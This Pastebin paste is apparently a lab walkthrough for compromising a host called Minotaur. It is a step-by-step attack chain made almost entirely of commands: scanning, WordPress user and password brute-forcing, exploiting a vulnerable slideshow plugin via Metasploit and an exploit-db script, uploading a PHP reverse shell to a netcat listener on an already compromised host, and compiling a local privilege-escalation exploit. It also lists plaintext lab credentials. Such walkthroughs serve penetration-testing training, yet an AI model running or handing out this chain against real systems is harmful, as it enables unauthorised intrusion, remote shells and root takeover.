API tools faq
paste
Advertisement
joemccray

Attacking 117

joemccray
Apr 26th, 2018
974
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.63 KB | None | 0 0
raw download clone embed print report
  1. ######################
  2. # Attacking Minotaur #
  3. ######################
  4.  
  5. Step 1: Portscan/Bannergrab the target host
  6. ---------------------------Type This-----------------------------------
  7. sudo nmap -sV 172.31.2.117
  8. -----------------------------------------------------------------------
  9.  
  10.  
  11.  
  12. Step 2: Vulnerability scan the web server
  13. ---------------------------Type This-----------------------------------
  14. nikto.pl -h 172.31.2.117
  15. -----------------------------------------------------------------------
  16.  
  17.  
  18.  
  19. Step 3: Directory brute-force the webserver
  20. ---------------------------Type This-----------------------------------
  21. dirb http://172.31.2.117 /usr/share/dirb/wordlists/big.txt
  22. -----------------------------------------------------------------------
  23.  
  24. ### dirb output ###
  25. ==> DIRECTORY: http://172.31.2.117/bull/
  26. -----------------------------------------------------------------------
  27.  
  28.  
  29. Step 4: Run wordpress vulnerability scanner
  30. ---------------------------Type This-----------------------------------
  31. wpscan --url 172.31.2.117/bull/ -r --enumerate u --enumerate p --enumerate t --enumerate tt
  32.  
  33.  
  34. cewl -w words.txt http://172.31.2.117/bull/
  35.  
  36.  
  37. cewl http://172.31.2.117/bull/ -d 1 -m 6 -w whateverbro.txt
  38.  
  39. wc -l whateverbro.txt
  40.  
  41. john --wordlist=whateverbro.txt --rules --stdout > words-john.txt
  42.  
  43. wc -l words-john.txt
  44.  
  45. wpscan --username bully --url http://172.31.2.117/bull/ --wordlist words-john.txt --threads 10
  46. -----------------------------------------------------------------------
  47.  
  48.  
  49.  
  50.  
  51.  
  52. Step 5: Attack vulnerable Wordpress plugin with Metasploit (just doing the exact same attack with MSF)
  53. ---------------------------Type This-----------------------------------
  54. msfconsole
  55.  
  56. use exploit/unix/webapp/wp_slideshowgallery_upload
  57.  
  58. set RHOST 172.31.2.117
  59.  
  60. set RPORT 80
  61.  
  62. set TARGETURI /bull
  63.  
  64. set WP_USER bully
  65.  
  66. set WP_PASSWORD Bighornedbulls
  67.  
  68. exploit
  69. -----------------------------------------------------------------------
  70.  
  71. Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
  72. This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
  73. and then from the lab network attacking other students.
  74.  
  75.  
  76. ---------------------------Type This-----------------------------------
  77. wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
  78.  
  79. tar -zxvf php-reverse-shell-1.0.tar.gz
  80.  
  81. cd ~/toolz/php-reverse-shell-1.0/
  82.  
  83. nano php-reverse-shell.php
  84. -----------------------------------------------------------------------
  85. ***** change the $ip and $port variables to a host that you have already compromised in the network
  86. ***** for this example I chose 172.31.2.64 and kept port 1234
  87.  
  88.  
  89. ---------------------------Type This-----------------------------------
  90. chmod 777 php-reverse-shell.php
  91. cp php-reverse-shell.php ..
  92. -----------------------------------------------------------------------
  93.  
  94.  
  95.  
  96. Browse to this link https://www.exploit-db.com/raw/34681/ and copy all of the text from it.
  97. Paste the contents of this link into a file called wp_gallery_slideshow_146_suv.py
  98. --------------------------Type This-----------------------------------
  99. python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
  100.  
  101. -----------------------------------------------------------------------
  102.  
  103.  
  104.  
  105. Set up netcat listener on previously compromised host
  106. ---------------------------Type This-----------------------------------
  107. ssh -l webmin 172.31.2.64
  108. webmin1980
  109.  
  110.  
  111. nc -lvp 1234
  112. -----------------------------------------------------------------------
  113.  
  114.  
  115.  
  116.  
  117. ---------------------Type This in your browser ------------------------
  118. http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
  119. -----------------------------------------------------------------------
  120.  
  121.  
  122. Now check your listener to see if you got the connection
  123. ---------------------------Type This-----------------------------------
  124. id
  125.  
  126. /sbin/ifconfig
  127.  
  128. python -c 'import pty;pty.spawn("/bin/bash")'
  129.  
  130. ---------------------------Type This-----------------------------------
  131. cd /tmp
  132. cat >> exploit2.c << out
  133. -----------------------------------------------------------------------
  134. **************paste in the content from here *****************
  135. https://www.exploit-db.com/raw/37292/
  136.  
  137. **************hit enter a few times *****************
  138.  
  139. ---------------------------Type This-----------------------------------
  140. out
  141.  
  142.  
  143. gcc -o boom2 exploit2.c
  144.  
  145. ./boom2
  146.  
  147. id
  148. -----------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!